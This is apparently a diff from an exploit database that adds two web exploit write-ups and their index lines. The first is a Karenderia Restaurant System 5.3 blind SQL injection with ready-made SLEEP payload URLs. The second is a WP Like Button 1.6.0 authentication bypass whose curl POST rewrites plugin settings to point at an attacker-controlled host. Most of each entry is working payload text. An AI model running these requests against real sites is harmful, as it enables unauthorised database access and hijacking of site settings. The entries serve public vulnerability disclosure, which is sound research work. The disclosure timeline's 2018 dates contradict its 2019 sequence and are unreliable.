DB: 2019-07-09

2 changes to exploits/shellcodes

Karenderia Multiple Restaurant System 5.3 - SQL Injection

WordPress Plugin Like Button 1.6.0 - Authentication Bypass

exploits/php/webapps/47077.txt

@@ -0,0 +1,46 @@
+===========================================================================================
+# Exploit Title: Karenderia CMS 5.3 - Multiple SQL Vuln.
+# Dork: N/A
+# Date: 05-07-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: buyer2@codemywebapps.com
+# Software Link: https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694
+# Version: v5.3
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: Karenderia Multiple Restaurant System is a
+restaurant food ordering and restaurant membership system.
+===========================================================================================
+# POC - SQLi (Blind)
+# Parameters : street-name
+# Attack Pattern :
+1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
+
+# GET Method :
+http://localhost/kmrs/searcharea?st=Los%20Angeles,%20CA,%20United%20States&street-name=1%20+%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))/*'XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR'|
+"XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR"*/
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: Karenderia CMS 5.3 - Multiple SQL Vuln.
+# Dork: N/A
+# Date: 05-07-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: buyer2@codemywebapps.com
+# Software Link: https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694
+# Version: v5.3
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: Karenderia Multiple Restaurant System is a
+restaurant food ordering and restaurant membership system.
+===========================================================================================
+# POC - SQLi (Blind)
+# Parameters : category
+# Attack Pattern :
+1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
+# GET Method :
+http://localhost/kmrs/store/cuisine/?category=1%20+%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))/*'XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR'|
+"XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR"*/&page=2
+===========================================================================================

exploits/php/webapps/47078.txt

@@ -0,0 +1,46 @@
+Exploit Title: WP Like Button 1.6.0 - Auth Bypass
+Date: 05-Jul-19
+Exploit Author: Benjamin Lim
+Vendor Homepage: http://www.crudlab.com
+Software Link: https://wordpress.org/plugins/wp-like-button/
+Version: 1.6.0
+CVE : CVE-2019-13344
+
+1. Product & Service Introduction:
+WP Like button allows you to add Facebook like button on your wordpress
+blog. You can also add Share button along with Like button or can add
+recommend button. As of now, the plugin has been downloaded 129,089 times
+and has 10,000+ active installs.
+
+2. Technical Details & Description:
+Authentication Bypass vulnerability in the WP Like Button (Free) plugin
+version 1.6.0 allows unauthenticated attackers to change the settings of
+the plugin. The contains() function in wp_like_button.php did not check if
+the current request is made by an authorized user, thus allowing any
+unauthenticated user to successfully update the settings of the plugin.
+
+3. Proof of Concept (PoC):
+For example, the curl command below allows an attacker to change the
+each_page_url parameter to https://hijack.com. This allows the attacker to
+hijack Facebook likes.
+
+curl -k -i --raw -X POST -d
+"page=facebook-like-button&site_url=https%%3A%%2F%%2Flocalhost%%2Fwp&display[]=1&display[]=2&display[]=4&display[]=16&mobile=1&fb_app_id=&fb_app_admin=&kd=0&fblb_default_upload_image=&code_snippet=%%3C%%3Fphp+echo+fb_like_button()%%3B+%%3F%%3E&beforeafter=before&eachpage=url&each_page_url=
+https://hijack.com&language=en_US&width=65&position=center&layout=box_count&action=like&color=light&btn_size=small&faces=1&share=1&update_fblb="
+"https://localhost/wp/wp-admin/admin.php?page=facebook-like-button&edit=1"
+-H "Content-Type: application/x-www-form-urlencoded"
+
+4. Mitigation
+No update has been released by the vendor. Users are advised to switch to a
+different plugin.
+
+5. Disclosure Timeline
+2019/06/24 Vendor contacted regarding vulnerability in v1.5.0 (crudlab@gmail.com)
+2019/06/30 Second email sent to vendor (crudlab@gmail.com)
+2019/07/02 Vendor released v1.6.0 update. Vulnerability still exists.
+Vendor did not acknowledge any emails.
+2018/07/03 Third email sent to vendor's billing email domain (info@purelogics.net)
+2018/07/05 Public disclosure
+
+6. Credits & Authors:
+Benjamin Lim - [https://limbenjamin.com]

files_exploits.csv

@@ -41408,6 +41408,7 @@ id,file,description,date,author,type,platform,port
 46931,exploits/multiple/webapps/46931.txt,"Deltek Maconomy 2.2.5 - Local File Inclusion",2019-05-27,JameelNabbo,webapps,multiple,
 46935,exploits/multiple/webapps/46935.txt,"Phraseanet < 4.0.7 - Cross-Site Scripting",2019-05-28,"Krzysztof Szulski",webapps,multiple,
 46936,exploits/php/webapps/46936.txt,"pfSense 2.4.4-p3 (ACME Package 0.59_14) - Persistent Cross-Site Scripting",2019-05-29,"Chi Tran",webapps,php,
+47077,exploits/php/webapps/47077.txt,"Karenderia Multiple Restaurant System 5.3 - SQL Injection",2019-07-08,"Mehmet EMIROGLU",webapps,php,80
 46956,exploits/php/webapps/46956.txt,"KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities",2019-06-03,SlidingWindow,webapps,php,
 46957,exploits/hardware/webapps/46957.txt,"AUO Solar Data Recorder < 1.3.0 - Incorrect Access Control",2019-06-03,Luca.Chiou,webapps,hardware,
 46958,exploits/php/webapps/46958.txt,"WordPress Plugin Form Maker 1.13.3 - SQL Injection",2019-06-03,"Daniele Scanu",webapps,php,
@@ -41459,3 +41460,4 @@ id,file,description,date,author,type,platform,port
 47069,exploits/php/webapps/47069.py,"Centreon 19.04  - Remote Code Execution",2019-07-02,Askar,webapps,php,
 47071,exploits/multiple/webapps/47071.txt,"Symantec DLP 15.5 MP1 - Cross-Site Scripting",2019-07-03,"Chapman Schleiss",webapps,multiple,8443
 47075,exploits/php/webapps/47075.txt,"Karenderia Multiple Restaurant System 5.3 - Local File Inclusion",2019-07-05,"Mehmet EMIROGLU",webapps,php,
+47078,exploits/php/webapps/47078.txt,"WordPress Plugin Like Button 1.6.0 - Authentication Bypass",2019-07-08,"Benjamin Lim",webapps,php,